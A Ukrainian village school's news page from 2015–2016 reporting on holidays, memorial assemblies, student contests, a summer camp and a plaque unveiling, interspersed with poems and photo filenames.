З метою поглиблення  уявлення учнів про Батьківщину; розвитку  громадянських  якостей школярів; виховання  поваги  до сучасного України  18 жовтня у  Білогородському НВК  відбулося свято для молодших класів  «Україна – ти моє сучасне і майбутнє».

У рамках свята   поповнили  дитяче об`єднання «Козачата»  новими    козачатами. А саме учнів  першого класу  посвятили  у козаки та козачки.

Класними керівниками 1-4 класів  та педагогом-організатором, були проведені цікаві ігри, бліц-турніри та вікторини про Україну. Прозвучали у виконанні учнів  патріотичні пісні.

%d1%84%d0%be%d1%82%d0%be-020 %d1%84%d0%be%d1%82%d0%be-021 %d1%84%d0%be%d1%82%d0%be-031 %d1%84%d0%be%d1%82%d0%be-042

Ми всім зобов’язані вчителю!

Вчителю мудрий,
Вчителю добрий,
Нас научили Ви,
Нас Ви ростили,
Дай Боже щастя,
Вам, справжня людина,
Щоб мали терпіння,
Щоб мали сили.

Учнівське обєднання ТЕМП Білогородського НВК приємно вразили педагогічний колектив, взявши на себе всю відповідальність за проведення уроків та організувавши святкову,  вітальну програму до Дня вчителя.

%d0%b2%d1%87%d0%b8%d1%82%d0%b5%d0%bb%d1%96-001                   %d0%b2%d1%87%d0%b8%d1%82%d0%b5%d0%bb%d1%96-002  %d0%b2%d1%87%d0%b8%d1%82%d0%b5%d0%bb%d1%96-004                   %d0%b2%d1%87%d0%b8%d1%82%d0%b5%d0%bb%d1%96-051 %d0%b2%d1%87%d0%b8%d1%82%d0%b5%d0%bb%d1%96-054                    %d0%b2%d1%87%d0%b8%d1%82%d0%b5%d0%bb%d1%96-038 %d0%b2%d1%87%d0%b8%d1%82%d0%b5%d0%bb%d1%96-033

 

  Перший урок 2016

Всі учні Білогородського НВК з радістю сіли за парти на перші уроки присвяченні 25 – річниці Незалежності України.

Класні керівники  1-9 класів  приклали максимум зусиль, щоб перші  уроки у кожному класі   були насичені цікавою інформацією, наочністю  на патріотичну тематику.

%d0%b8%d0%b7%d0%be%d0%b1%d1%80%d0%b0%d0%b6%d0%b5%d0%bd%d0%b8%d0%b5-069          %d0%b8%d0%b7%d0%be%d0%b1%d1%80%d0%b0%d0%b6%d0%b5%d0%bd%d0%b8%d0%b5-075   %d0%b8%d0%b7%d0%be%d0%b1%d1%80%d0%b0%d0%b6%d0%b5%d0%bd%d0%b8%d0%b5-079           %d0%b8%d0%b7%d0%be%d0%b1%d1%80%d0%b0%d0%b6%d0%b5%d0%bd%d0%b8%d0%b5-082 %d0%b8%d0%b7%d0%be%d0%b1%d1%80%d0%b0%d0%b6%d0%b5%d0%bd%d0%b8%d0%b5-076           %d0%b8%d0%b7%d0%be%d0%b1%d1%80%d0%b0%d0%b6%d0%b5%d0%bd%d0%b8%d0%b5-086

Зі святом 1 вересня!Результат пошуку зображень за запитом "малюнок на 1 вересня"

Проминуло літо непомітно,
В спогадах лишивши теплий слід.
Школа нам всміхається привітно,
Обіцяючи відкрити новий світ.

Барвиста осінь зустрічає нас важливим, урочистим, незабутнім святом.  Рясніють квіти, сяють посмішки.   Схвильовано радіють учні, вчителі, батьки Білогородського НВК,  дочекавшись   цього  чудового,  ні з чим незрівнянного  дня  —  Першого дзвоника, в мить, коли дружня шкільна родина приймає у свої обійми першокласників!

Ціле літо школа нас чекала,

Чепурилась, щоб зустріти нас.

Так багато знань приготувала

В добру путь! Настав навчання час.

%d0%b8%d0%b7%d0%be%d0%b1%d1%80%d0%b0%d0%b6%d0%b5%d0%bd%d0%b8%d0%b5-014                 %d0%b8%d0%b7%d0%be%d0%b1%d1%80%d0%b0%d0%b6%d0%b5%d0%bd%d0%b8%d0%b5-030     %d0%b8%d0%b7%d0%be%d0%b1%d1%80%d0%b0%d0%b6%d0%b5%d0%bd%d0%b8%d0%b5-048                 %d0%b8%d0%b7%d0%be%d0%b1%d1%80%d0%b0%d0%b6%d0%b5%d0%bd%d0%b8%d0%b5-054 %d0%b8%d0%b7%d0%be%d0%b1%d1%80%d0%b0%d0%b6%d0%b5%d0%bd%d0%b8%d0%b5-056                  %d0%b8%d0%b7%d0%be%d0%b1%d1%80%d0%b0%d0%b6%d0%b5%d0%bd%d0%b8%d0%b5-061

 

Наші цікаві будні у таборі…

Цікаво,   змістовно,  захоплююче  продовжує  свою  роботу оздоровчий табір  «Калина» при Білогородській ЗОШ  І-ІІ ступенів.  Кожен вихованець з задоволенням приходить  щодня  до табору. Вихователі докладають максимум зусиль, щоб кожен день у таборі був неповторним.  Саме таким став день14 червня, у який  під   керівництвом вихователів Перець Світлани  Анатоліївни  та Копко Лариси Іванівни,   був  проведений  фестиваль  «Жовто-синя моя  Україно!».  У рамках  фестивалю  було проведено  флеш- моп   «Це моя земля…», та виховний захід «Незалежна моя країно…».

флеш моп 001 флеш моп 003 флеш моп 006 флеш моп 008

В добру путь!!!   

Летять роки, немов пташина зграя,

Пливуть роки потоком бурних рік,

І мчать вони холодними вітрами,

Біжать мільйонами стежинок і доріг.

Сьогодні Білогородська ЗОШ І-ІІ ступенів   нагадує осіннє дерево, від якого відірвалось 5 листочків. Тому, що  9 червня 2016 року  відбулися  урочини  з нагоди  вручення свідоцтв  про  базову загальну середню освіту . Доля  розкидає  наших 5 випускників  у буремному вихорі життя. Тож  бажаємо вам щасливої дороги в життя, нехай здійсняться всі ваші заповітні мрії і сподівання. Нехай ангел-хоронитель береже вас від усього злого і нехай ваші добрі починання благословить Господь Бог.

 фото випуск 009 фото випуск 008 фото випуск 007 фото випуск 006 фото випуск 004  

Вас вітає пришкільний табір “Калина”

31 травня  у Білогородській  ЗОШ  І-ІІ ступенів відбулося відкриття пришкільного оздоровчого  табору  «Калина».  Після урочистої лінійки діти були  ознайомлені з режимом  роботи, правилами поведінки в таборі (розподіл на загони, вивчення девізу, розучування табірної пісні, розподіл доручень).  Під  девізом «Серце моє там, де моя Батьківщина» діти створювали  свою маленьку державу  у  конкурсі  малюнків на  асфальті «Сонце, діти, квіти». Малювали з радістю, бо твердо віримо, що щастя на боці того, хто задоволений.

     Закінчився  перший день роботи табору дискотекою у сільському клубі.

image002 image003 image008

Школо, до побачення!!!

Всім заправляє час, його нестримний вітер

Відносить наші дні на тисячі доріг.

Та в кінці травня ми беремо квіти

Несемо в школу їх як оберіг.

Школа і учні затихли у чеканні,

Бо настає та хвилююча мить:

Наші учні найстарші на дзвоник останній

Вийдуть ще раз, щоб школу свою залишить.

 

Вся шкільна родина Білогородської ЗОШ І-ІІ ступенів   вітає учнів та вчителів Дубенського району  із завершенням ще одного цікавого, пізнавального та складного 2015-2016 навчального року.  Бажаємо  всім гарно відпочити, набратися сил та позитивної енергії.

До зустрічі 1 вересня!!!

 

Изображение 013

Изображение 018

Изображение 067

В жорнах репресій 1937 -1938  рр…

Тоді ми йшли по таборах…

Одних замучили катюги,

Зломились інші від наруги

І в забутті скінчили шлях.

Та ми здолали сум і страх,

Хоч хтось не бачить в цім заслуги,

І вийшли з вірою в серцях

В чеканні нової потуги.

І дочекались, не запізно.

Хоч знов навала суне грізна,

Вже зміна прапор наш несе.

Під ним вона бійців збира,

Завзятих лицарів пера,

Для них Вкраїна – над усе .

З метою формування національної свідомості, патріотичного виховання дітей та гідного вшанування жертв політичних репресій у у  Білогородській ЗОШ І-ІІ ступенів  було проведено низку виховних заходів:

–   Лінійка, присвячена   пам’яті жертв політичних репресій, запалено свічі, хвилиною мовчання вшановано всіх загиблих.

– В шкільній бібліотеці   було організовано  виставку  фотоматеріалів,  художньої  та історико-краєзнавчої літератури на тему політичних репресій.

–  Прочитано і обговорено оповідання  Віктора Близнеця «Павутинка» .

– Година  спілкування  «У жорнах репресій 1937-1938 рр…»

Із року в рік часопис віддаляє
Своїх
нащадків далі від війни.
Та травень
знову й знову  нагадає,
Як
 із життя ішли його сини.

Вже 71 рік несемо ми квіти до могил загиблих.  Несемо з вдячністю в серцях. І, хоч все далі відходять грізні роки Другої Світової війни  та не згасає пам’ять про тих, хто приніс на вівтар Великої Перемоги своє життя, хто поліг у боях заради щастя інших.

Війна нагадує про себе тисячами обелісків і братських могил. Вони – святиня нашої пам’яті. Сьогодні ми віддаємо данину  пам’яті тим, хто загинув на фронтах Другої Світової війни, хто віддав життя, щоб ми жили щасливо.

nTGIgO8eL6I OclFmSe1D_U tmf_V6Bjx5U UVMypm63Rd0

9 Травня – день смутку і печалі

9 Травня – і пам’ять ожива.

 

 “Моя перша книжка…

В житті кожної людини найкращим і найпам’ ятнішим буде 1 клас!

У Білогородській ЗОШ  21 квітня відзначили Свято Букварика.  Це  перша  сходинка у шкільному  житті , яку  діти подолали власною працею. Прощання з Букварем не було сумним, бо попереду – невідоме, незнайоме, нові відкриття, нові знання, нові друзі .

Зі словами подяки та щирим вчительським теплом   вчителька Бабійчук З. М. звернулася до батьків і побажала їхнім  родинам сімейного добробуту, радісних дитячих усмішок, здоров’я, любові та миру, подякувала за допомогу у навчанні.

Нехай свято увійде до вашої оселі добрим і радісним, принесе злагоду і достаток, натхнення на нові вагомі здобутки.

DSCN2227 DSCN2230 DSCN2232

«Є місце подвигу не тільки в дні війни…»

Жорстокий, ніжний і свавільний світе,

Скажи скоріш, що діяти мені,

Тебе чи ненавидіти, а чи любити

У міражах чорнобильських вогнів?

Мовчиш… А серце жде і прагне слова,

Немов земля обвуглена — тепла

Людських долонь, котрі не пахнуть кров’ю,

Бо маками у полі проросла.

У ніч з 25 на 26 квітня 1986 року о 1 год. 23 хв. 40 с, коли всі спали безтурботним сном, над четвертим реактором Чорнобильської атомної електростанції несподівано розірвало нічну темряву велетенське полум’я. Почався новий відлік українського часу. Болісний. Гіркий. Печальний…

Саме    тому  у Білогродській ЗОШ І-ІІ ступенів  педагог – організатор Копко Л.І., провела  виховний захід   «Є місце подвигу не тільки в дні війни…».   Хвилиною мовчання учні школи вшанували пам`ять померлих від радіаційного смерчу.

чорнобиль 001 чорнобиль 005

« У світі немає страшніших могил…»

Є в світі картини, від споглядання яких пекучим болем пронизує мозок, серце і душу. Мабуть, найтяжча з таких картин – це малі діти за колючим концтабірним дротом.

У  гітлерівських таборах знищено шість мільйонів людей. Печальні очі жертв дивляться на нас з музейних фотографій. І в тих очах  одне – «Не забувайте! Таке не повинно повторитись!».

Саме   тому у Білогородській ЗОШ І-ІІ ступенів 11 квітня відбулися заходи  до Міжнародного дня визволення в`язнів фашистських  таборів:

«У світі   немає страшніших могил»,  «Доля маленьких в`язнів».

фото шолохов 009

фото шолохов 010

Своїм корінням  родина Шолохова сягає України.

 

У п’ятницю, 8 квітня 2016 року, о 13.00   у Білогородській ЗОШ І-ІІ ступенів відбулися  урочистості з нагоди відкриття меморіальної дошки лауреату Нобелівської премії, всесвітньо відомому письменнику Михайлу Шолохову.

У 1944 році, коли фронт пересувався на захід, від фашистів визволяли Білогородку,  Михайло Шолохов деякий час перебував у цьому українсько-польському-чеському селі як  військовий кореспондент.  Він проживав у хаті православного   священика   Свято-Лукинського храму Льва Шаравського.  Про це свідчить науковий працівник краєзнавчого музею м. Кременця,  Гаврило Іванович Чернихівський,  що бачив  світлини  із сімейного альбому, де на східцях ганку священицького будинку стоять – Михайло Шолохов у формі полковника і священик Лев Шаравський у рясі, з хрестом на грудях.

На урочинах були присутні гості:

  • член спілки письменників України, заступник керівника апарату Дубенської райдержадміністрації Юрій Юрійович Шесталюк,
  • член правління Рівненської обласної організації Національної спілки краєзнавців, член громадської ради при Дубенській райдержадміністрації, письменник, просвітянин Микола Пшеничннй,
  • головний спеціаліст відділу освіти Дубенської райдержадміністрації

Лідія Білик,

  • колишній вчитель Білогородської восьмирічної школи, письменник, лауреат Міжнародної премії ім. Миколи Сингаївського та ім. Авеніра Коломийця автора двохсот пісень Сергій Рачинець.

Освятив меморіальну  дошку   отець    Сергій настоятеля Свято-Лукинського храму с. Білогородки.

Улюблені українські пісні Михайла Шолохова на сл..Т.Шевченка виконали  учні – бандуристи Вербської дитячої школи мистецтв:  «Зоре моя вечірняя» –  Катерина Ільчук,  «Тече вода в синє море» –  тріо бандуристок: Світлана Стецюк, Ганна Котвінської, Зоя Завальнюк.

Ось і відкрилася ще одна сторінка про події Другої світової війни – сторінка перебування в селі Білогородка М. Шолохова, військового кореспондента в 1944 р.

фото шолохов 003 фото шолохов 004 фото шолохов 006

«Весна, квіти і Ви…»

Сьогодні, жінко, ваше свято

І на зорі, ще в ранній час,
Йде славний березень вітати
Живими пролісками вас!

Жінка – скільки сили, тепла, ніжності у цьому слові! Жінки можуть все! Але ким би вони не були, які рекорди не встановлювали, вони завжди залишаються жінками. І довічно стоятимуть поруч: жінка – дружина, жінка – сестра, жінка – мати!
Недарма, мабуть, святкуємо ми жіночий день саме навесні. Весна.. Лагідна, загадкова, тендітна. І саме тому 4 березня у Білогородській ЗОШ
І-ІІ ступенів відбулися загальношкільні батьківські збори присвячені Дню
8 Березня. Всі свої найкращі побажання, пісні, танці, інсценізації подарували учні своїм мамам, бабусям, вчителям під час свята «Весна, квіти і Ви…».

фото 005 фото 012 фото 016 фото 018 фото 030 фото 048

У нас сьогодні гості…

25 лютого 2016 року на базі Білогородської ЗОШ І-ІІ ступенів було проведено чергове заняття Школи становлення вчителя мистецтва з теми “Професійна майстерність учителя мистецтва у форматі нового мислення”.
Учитель мистецтва – це фахівець загальнокультурного розвитку, образного мислення, розвиненої фантазії й уяви, культури почуттів, спроможний до імпровізації і творчості. Він має переосмислити мету освіти, систему методів, структуру уроку, а головне – власну роль організатора взаємодії дитини із твором мистецтва. Саме такими є педагоги Білогородської школи – досвідчений вчитель музичного мистецтва, старший вчитель, керівник районної Школи становлення вчителя мистецтва Лариса Копко та молодий учитель образотворчого мистецтва, слухач Школи Віталій Криленко, які провели інтегрований урок мистецтва з розвитку образного мислення учнів 6-го класу, у ході якого продемонстрували творчу взаємодію вчителя і учнів, яка забезпечує задоволення від самого процесу навчання, зацікавлення тим, що вивчається. Урок розкрив творчий потенціал педагогів і став не тільки новим етапом у професійній діяльності вчителів, а й чудовою можливістю вийти на новий рівень педагогічної майстерності.
Методист РМК Ірина Панасюк провела з молодими педагогами методичний тезаурус щодо професійної компетентності та педагогічної техніки учителя мистецтва та анкетування «Як зацікавити учня своїм предметом».

1

2

3

Барви українського слова.

Учні 5 класу разом із вчителем української мови і літератури Кравчук М.А. запросили гостей на слово щире, на дзвінку пісню, на свято “Барви українського слова”, присвячене Міжнародному Дню рідної мови. З дитячих уст прозвучало слово про рідну мову, виплекану колоссям, землею, виспівану птахами, звеличену письменниками. В цей день читці-декламатори всіх класів читали поезію про мову- коштовний і неоціненний скарб нашого народу. Свято закінчилося читанням “Молитви за мову” Катерини Мотрич, заповідями збереження рідного слова.

замок 020

замок 021

Герої не вмирають…

20 лютого 2016 року вся Україна відзначає вшанування подвигу учасників Революції гідності й увічнення пам’яті Героїв Небесної Сотні.
Минуло два роки із того моменту, як загинули вони – герої, яких народила революція Майдану. Але в першу чергу це стало випробуванням на цінність особистості людини, виміром людської гідності.
Ми в скорботі й з великою вдячністю згадуємо Героїв Небесної сотні, котрі відтепер постійно споглядатимуть за нами та нашими вчинками.
Щоб віддати належну шану мужнім учасникам Революції гідності, які віддали своє життя, захищаючи ідеали демократії та європейського майбутнього нашої держави, в Білогородській ЗОШ І-ІІ ступенів розпочали перший урок 22 лютого з виконанням Державного Гімну України та хвилиною мовчання, а також вчителем історії Симич Людмилою Михайлівною була проведена година спілкування «Небесна сотня: герої не вмирають…»

замок 006 замок 013 замок 016 замок 018

Пекельні дороги Афгану…

15 лютого у нашій країні відзначають День виведення військ з Афганістану. В цей день ми в 27 раз згадуємо про героїв цієї страшної війни. Дуже хочеться, щоб поезії, розповіді, вистраждані в Афганістані і про Афганістан, пройшли крізь юні дитячі серця, і всі зрозуміли, що найстрашніше і найбезглуздіше у світі – це війна. Ми повинні пам’ятати тих, хто пережив, тих, хто не дожив, не доспівав, не докохав…
Педагог- організатор Копко Лариса Іванівна, провела годину спілкування «Пекельні дороги Афгану…», у рамках якого була проведена зустріч з односельчанином – афганцем Фисюком Агафоном Ананійовичем та його побратимом Володимиром Федоровичем Брижицьким. Цікава і змістовна розповідь очевидців  дуже зацікавила учнів школи.

фото 003 фото 022 фото 025 фото 032 фото 035

On the wings of love.

У п`ятницю 12 лютого у Білогородській ЗОШ І-ІІ ступенів відзначили День всіх закоханих «On the wings of love». У заході-конкурсі брали участь учні 5-9 класів. За перемогу боролися 3 пари:

Свіщ Світлана і Мілецький Василь – 5 клас; Симуник Діана – 6 клас, Кузьмич Мирослав – 7 клас; Новак Марія та Сєровєтнік Дмитро – 8 клас. Захід проводився рідною та англійською мовами. Вчителем англійської мови Захарчуком Іваном Івановичем були продумані змістовні конкурси та художні номери між ними. Переможцями стала пара Діана та Мирослав. Всі учасники отримали солодощі та незабутні враження. Дійство завершилося святковою дискотекою.

IMG_20160212_144604 IMG_20160212_144724 IMG_20160212_153005 IMG_20160212_160218 IMG_20160212_160529

«Живи, Кобзарю, в пам`яті людській….»

Тарасе любий, ми йдемо до тебе,
Читаючи вірші із «Кобзаря»,
Радіючи, що ти бував у нашім краї
Твоїми кроками тут сходжена земля.
11 лютого у Білогородській ЗОШ І-ІІ ступенів вчителем української мови та літератури Кравчук Марією Андріївною відбулися шевченківські читання «Живи, Кобзарю, в пам`яті людській….». Діти з великим задоволенням перечитували «Кобзар», щоб продемонструвати свої вміння у читанні Шевченкового слова. У конкурсі взяли участь 33 учні школи. Учасників оцінило вчительське журі. Підсумки конкурсу підвела спеціаліст відділу освіти Дубенської райдержадміністрації , вчитель зарубіжної літератури даної школи Білик Лідія Степанівна. Переможцями стали: Симуник Діана та Окренець Діана, учениці 6 класу, Окренець Аліна та Лакатош Аліна, учениці 3 класу, ці учасники будуть захищати честь школи у районному етапі.

20160211_115419 20160211_120859 20160211_121821 20160211_122745

Вони загинули за Україну.

Добре кажуть : „Хто не знає свого минулого, не вартий свого майбутнього”. І це дійсно так , бо так само , як дерево тримається на землі своїми коріннями , так людина тримається на землі своїм минулим. Людина , яка не знає минулого – як перекотиполе , куди вітер подме , туди воно й котиться. Однією із найтрагічніших її сторінок є бій під Крутами.
Пам’ять про Крути, про те, що і тепер Україна перед небезпекою , вона знову поглинута ненаситним окупантом. І тепер на кожного з нас чекають випробування , які ми мусимо витримати , щоб захистити Батьківщину від будь-якої агресії. Гартуймося і готуймо себе до праведної боротьби за волю і майбутнє , пам’ятаючи наших Героїв.
Хвилиною мовчання було вшановано героїв двох поколінь.
Саме цим подіям у Білогородській ЗОШ І-ІІ ступенів, педагог – організатор Копко Л.І. та вчитель історії Симич Л.М. 01.02.2016 року провели заходи до Дня відзначення пам`яті Героїв Крут.

IMG_20160201_115308 IMG_20160201_115627

Exif_JPEG_420

З Новим Роком в добрий час

                                                                                                    Дід Мороз іде до нас,
                       

З тим що серце забажає,

І до всіх хай завітає

Хай принесе у  кожну хату,

Щастя й радості багато

Хай здоров’я повний міх

Покладе на ваш  поріг!

Дочекалися  Діда  Мороза та Снігурочку учні Білогородської ЗОШ І-ІІ ступенів.

29 та 30 грудня відбулися святкові дійства у школі. Масу задоволення отримали  учні, вчителі та гості свята.  Цікавими та змістовними були  виступи  всіх персонажів,  казкових  героїв під керівництвом педагога-організатора Копко Л.І. та вчителів початкових класів: Остапенко В.І., Бабійчук З.М., Бронської Л.О., Матвієвської  В.В.  Всі учні школи отримали подарунки від спонсорів:

ТзОВ  «Дубенський  край»  та сільського голови Ірини  Івашинюти.

DSCN1910                               DSCN1918 DSCN1928                                   DSCN1941 DSCN1945

Україною крокує святий Миколай

18 грудня у Білогородську школу завітав Миколай. Діти знетерпінням чекали його приходу, тому підготували для нього в подарунок вірші та пісні. А ще цікаво було подивитися на дійство, яке відбувалося «на небі», де глядачі побачили як Ангели допомагають Миколаєві підготувати дарунки дітям. І наші малята теж отримали від Миколая подарунки – цікаві книги про дитячі пригоди.
А ще у нашу школу завітали гості – вихованці Вербської дитячої музичної школи. Вони привітали всіх зі святом та подарували невеличкий концерт.

OLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA

Дитині мало прав, їй потрібний достаток
і виховання, щоб ними скористатися.
О. І. Герцен.

Одна з найгостріших людських потреб бути захищеним у правовому плані – може бути реалізована завдяки правовій освіті та вихованню громадян.
Метою правового виховання в школі є формування в кожного учня системи знань з питань основ держави і права, розвиток інтересу до цієї галузі знань і зв’язок права з навколишньою дійсністю; інтересу до її законодавчих та виконавчих органів; прищеплення навичок правосвідомої поведінки; формування потреб та вмінь активно захищати в установленому законом порядку свої права та законні інтереси інших осіб.
В Білогородській ЗОШ І – ІІ ст. з 07 по 11 грудня проводився тиждень права. Вчитель правознавства Симич Л. М. показала презентацію “Права дитини в Україні”, документальний фільм “Що таке права людини”, провела правові вікторини для 1 – 9 класів “Права казкових героїв”, ”Мої права”. Класні керівники протягом тижня проводили бесіди на правову тематику . Бібліотекар Грицюк Н. С. показала книжкову виставку “Знай свої права”. Проведено конкурс плакатів “Права дитини”. 11 грудня Симич Л. М. провела для учнів 1 – 9 класів всеукраїнський урок права “Ти знаєш, що ти людина…”.

2015-12-09 11.08.14 2015-12-11 11.49.56 2015-12-11 11.53.58 2015-12-11 12.12.04

Земний уклін тобі, солдате!

Літературну п’ятихвилинку “Земний уклін тобі, солдате!” проведено в Білогородській ЗОШ І – ІІ ступенів 7 грудня цього року . Саме тут звучали вірші, підібрані учнями, про воїнів, які захищають рубежі рідної держави від непроханих ворогів. З нашого села в АТО пройшли і проходять уроки мужності Ліщук Анатолій, Гуцман Володимир, Вовк Руслан, Савчук Михайло, Ніколайчук Юрій та Гудзь Олександр. З дитячих уст звучали слова молитви за Україну, за її вірних захисників, щоб повернулися живими додому.
Хвилиною мовчання вшанували пам’ять синів Дубенщини, за ким війна обірвала життя.
Анатолій Ліщук передав прапор, військові апортименти, які привіз із фронту. Діти з цікавістюрозглядали і приміряли до себе героїчний одяг. А поруч стояла мама Анатолія – Катерина Дмитрівна, в очах якої сльози радості за сина.
На закінчення першокласники прочитали вірші про мир – найбільше щастя на Землі.

0dS7vi_V5-8 - копия 7-bV9aXlFfA -k95e4uZhpk LUztR9cnzOk

Ми солідарні в цій нерівній боротьбі

  З часів гріхопадіння в історії людства спостерігалося безліч найрізноманітніших вкрай негативних явищ. Якщо виключити згубні природні катастрофи, а так само здавалося б нескінченну низку віроломних кровопролить, в яких досягло успіху людство і спробувати виділити якісь ще події, які підкошували наші з вами життя, то безсумнівно ми зупинимося на жахливих  і вкрай жорстоких епідеміях смертельних для людини хвороб. Одна з останніх епідемій нашої сучасності була прозвана чумою 20-го століття – синдром набутого імунного дефіциту, скорочено – СНІД.  Не дивлячись на досягнення нашої прогресивної науки ми на превеликий жаль змушені констатувати, що вона ще далеко не закінчена. Її масштаб досі не може залишати байдужими жодної розсудливої людини. Офіційна статистика поширення СНІДу все змушує нас відчувати глибоку тривогу.

1 грудня в школі пройшла акція « Ми солідарні в цій нерівній боротьбі». Символ боротьби зі СНІДом – червона стрічка.

Європа 003 снід 001 снід 004

 Акція «Оберіг солдату»

Жоден учень Білогородської ЗОШ І-ІІ ступенів не є байдужим до подій, які відбуваються на сході України. Не одноразово  школярі  приймали участь у різних  зустрічах, конкурсах, ярмарках, благодійних акціях.  Вилучені кошти, одяг, засоби особистої гігієни  передавалися бійцям АТО. А   30 листопада  дуже активно  долучилися до акції «Оберіг солдату».  22 обереги були виготовлені та передані солдатам, щоб оберігали та зігрівали душі  дорогим захисникам.

123 029  123 032

Пам`яті незгасна свіча …

26 листопада у Білогородській ЗОШ І-ІІ ступенів, відбувся виховний захід

 «Пам`яті незгасна свіча …», до дня  пам`яті жертв голодомору та політичних репресій. Педагог-організатор Копко Л. І., та вчитель історії Симич Л.М.,  навели  безліч історичних фактів. Продемонстрована презентація  – «Страшне лихоліття» про дані події  вразили учнів школи, адже третина всіх померлих від голоду – діти.

Хвилиною мовчання пом`янули всіх померлих від голоду.

Школярі познайомились з тематичною літературною виставкою книг «Голод -33».

Всім  було наголошено, що у суботу, 28 листопада, потрібно долучитися у кожній домівці до акції «Запали свічку».

голодомор 003 голодомор 009 голодомор 011

Свято в школі

25 листопада відбулася зустріч учнів Білогородської  ЗОШ І-ІІ ступенів із відомими письменниками Дубенщини:  Любов’ю та Миколою Пшеничними, Сергієм Рачинцем та Ерною Шевчук. Запросила їх на літературний урок вчитель української мови та літератури Кравчук Марія Андріївна. Зустріч відбулася в шкільному музеї «Етнографічна світлиця».

Першим виступив лауреат Міжнародної літературно-мистецької премії імені Миколи Сингаївського Сергій Рачинець. Коротко розпов     ів про себе (адже він саме в нашій школі почав свою трудову діяльність вчителем ). Поет прочитав свої вірші, показав дітям Золоту медаль і Диплом, яким був нещодавно нагороджений. Це його сьома велика нагорода.

Прочитав свої твори і Микола Пшеничний. Любов Пшенична презентувала свою книгу «Життя і воскресіння». Особливо сподобались школярам її смішні скоромовки та лічилки.

Ерна Шевчук розповіла про проживання поляків у нашій місцевості. Зокрема була привернута увага до Дня народження поляка за походженням, українця за духом Й.К.Пачоського, який народився в нашому селі. Йому присвячена Меморіальна дошка, яка красується на стіні нашої школи. Також пані Ерна познайомила дітей з творчістю польського поета Яна Твардовського. Сторіччя з Дня народження якого відзначає світова спільнота. Вона прочитала його твори польською мовою, а в перекладі читали М.Пшеничний, Л.Пшенична, а також учні школи.

Письменники подарували школі та бібліотеці свої книги. Бібліотека поповнилась новими збірками, за що ми дякуємо гостям. Діти були приємно вражені та задоволені, брали автографи, спілкувались.  На згадку подарували квіти та сувеніри, запрошували на нові зустрічі.

123 028 123 024 123 008 123 003 123 001

День Свободи та Гідності
21 листопада 2015 року вся Україна відзначає День Гідності і Свободи.
Минуло два роки із того моменту, як загинули вони – герої, яких народила революція Майдану. Але в першу чергу це стало випробуванням на цінність особистості людини, виміром людської гідності.
Ми в скорботі й з великою вдячністю згадуємо Героїв Небесної сотні, котрі відтепер постійно споглядатимуть за нами та нашими вчинками.
З такої нагоди у Білогородській ЗОШ І-ІІ ступенів були проведені наступні заходи:
1. Літературна виставка «Війна, майдан, біль».
2. Демонстрація презентації «Як це було…».
3. Година спілкування «Революція Гідності».

  1 2 3 4

Краса врятує світ

13 листопада класними керівниками та педагогом-організатором у Білогородській ЗОШ І-ІІ ступенів  було проведено розважальний конкурс

«Міс Королева Осінь – 2015».

У конкурсі з великим задоволенням приймали участь дівчата від 5 по 8 клас:

Коткудак Катерина, Окренець  Діана, Окренець Руслана,  Дивак Софія.

Учасниці змагалися у різних  конкурсах:  представлення,  захоплення,

господарочка, акторська майстерність, художній номер, пародія на співака. Членам журі було не легко вибрати найдостойнішу, але конкурс є конкурс  і «Міс Королева Осінь – 2015» стала Окренець   Діана, учениця 6 класу. Всі учасниці отримали цінні подарунки та солодощі від спонсорів: сільського голови Івашинюти Ірини Іванівни  та місцевого підприємця Василя Гаврилюка.

IMG_1638 IMG_1660 IMG_1662 IMG_1668 IMG_20151113_153713 бат

Сьогодні вся Україна відзначає День української писемності та мови. Білогородська загальноосвітня школа І-ІІ ступенів ніколи не залишається осторонь такої події. Тож 9 листопада 2015 року учні та вчителі взяли активну участь у святі. У школі були проведенні наступні заходи:

  1. Свято мови “Колиска мого народу.”
  2. Демонстрація презентації “Мова – серце і канва нації!”
  3. Конкурс віршів “Єдиний скарб у тебе – рідна мова.”
  4. Написання XV Всеукраїнського радіодиктанту національної єдності учнями 5-9 класів

 

ПОСВЯТА В КОЗАЧАТА

Козацтво – слава України
автор: Яніна Мельник
За честь і гідність України,
За волю, правду і добро
Вони боролись щохвилини,
Їх кров лилася як вино!
Всіх ворогів вони долали,
Всі землі наші зберегли,
Завжди від лиха захищали
І гордо прапор наш несли!
Сини Твоєї Батьківщини,
В них сила духу непоборна!
Козацтво – слава України,
Це гордість наша всенародна!

РУШНИК ЄДНАННЯ

Рушник для кожного українця є символом, оберегом. З покоління в покоління передається ця реліквія у кожній сім`ї. З рушниками зустрічають та проводжають, ними прикрашені ікони у кожній оселі, без них не обходиться жодне обрядове свято. З метою вшанування, збереження традицій, єднання українців у єдину родину 16 жовтня у Білогордській ЗОШ І-ІІ ступенів відбулася акція «Рушник єднання».

козачата 010 козачата 011 козачата 012 козачата 013 козачата 015

 

Олімпійський тиждень

В рамках “Олімпійського тижня”у Білогородській ЗОШ І- ІІ ст. було проведенно фізкультурно – оздоровчі та спортивні заходи приурочені Дню фізичної культури та спорту.
У школі діє виставка   « Олімпійська книга»   (виставка книг на Олімпійську тематику).
Також було проведено конкурс « Олімпійський знавець» (конкурси, вікторини). До дня фізичної культури та спорту було проведено спортивне свято « Подорож у країну спорту». На святі було проведено: конкурси, забави, естафети, змагання.

“Свято Перемоги”
Встеляйте квітами дороги,
Дзвінкі заспівуйте пісні.
Сьогодні – свято перемоги,
Найкраще свято на землі.

Знову на нашу землю завітала весна і своїм цвітом оновила її. Усе ожило, пробудилося, усе набирається краси й молодості. Здається, що навесні ми по-особливому, ніжно й трепетно, любимо рідну землю. З весною приходить до нас велике свято Перемоги Другій Світовій війні.
Кожний рік віддаляє нас від тієї незабутньої і переможної весни 45-го! Живою і невмирущою є пам’ять про неї та вдячність за неперевершену стійкість і мужність, за неоціненний внесок у загальну перемогу людства над фашизмом.
Даним подіям приурочений мітинг-реквієм, який відбувся 9 травня 2015 року біля обеліску загиблим односельчанам у селі Білогородка.

Урок мужності “Хоробрі серця”
